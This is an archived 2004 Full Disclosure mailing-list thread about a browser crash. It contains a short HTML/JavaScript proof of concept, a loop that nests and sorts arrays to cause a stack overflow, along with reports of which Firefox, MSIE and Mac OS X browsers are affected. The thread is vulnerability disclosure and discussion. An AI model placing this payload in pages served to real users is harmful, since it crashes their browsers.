Full Disclosure mailing list archives

More Browser on Macosx flaws: nested array sort() loop Stack overflow exception

From: "Marco Mella" <marco.mella () telecomitalia it>
Date: Thu, 25 Nov 2004 16:45:31 +0100

Same flaw works on MACOSX 10.3.6 with:
-Safari 1.2.4
-Mozilla 1.7
-Camino 0.7.0
-Firefox 1.0
-Opera 6.0.3

Not affected IE 5.2.3

----
Marco


On 25/nov/04, at 10:49, Randal, Phil wrote:

An email to security () mozilla org would have sufficed.

That email address can be found at
http://www.mozilla.org/security/bug-bounty.html

Phil

----
Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of
Berend-Jan Wever
Sent: 25 November 2004 01:05
To: full-disclosure () lists netsys com;
vuln-dev () securityfocus com; bugtraq () securityfocus com
Subject: [Full-disclosure] FIREFOX flaws: nested array sort()
loop Stack overflow exception

Hi all,

Same flaw works for Firefox as well as MSIE:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new
Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new
Array(a)).sort(); } </SCRIPT> </HTML>

Added to the list:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

I'd have loved to CC mozilla about this, but I didn't have
the time to do the crash course "how to write a bug report"
and go through all that bugzilla crap.

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


--------------------------------------------------------------------

CONFIDENTIALITY NOTICE

This message and its attachments are addressed solely to the persons above and may contain confidential information. If 
you have received the message in error, be informed that any use of the content hereof is prohibited. Please return it 
immediately to the sender and delete the message. Should you have any questions, please contact us by replying to 
webmaster () telecomitalia it.

       Thank you

                                       www.telecomitalia.it

--------------------------------------------------------------------

Current thread:

RE: FIREFOX flaws: nested array sort() loop Sta ck overflow exception Randal, Phil (Nov 25)
- More Browser on Macosx flaws: nested array sort() loop Stack overflow exception Marco Mella (Nov 25)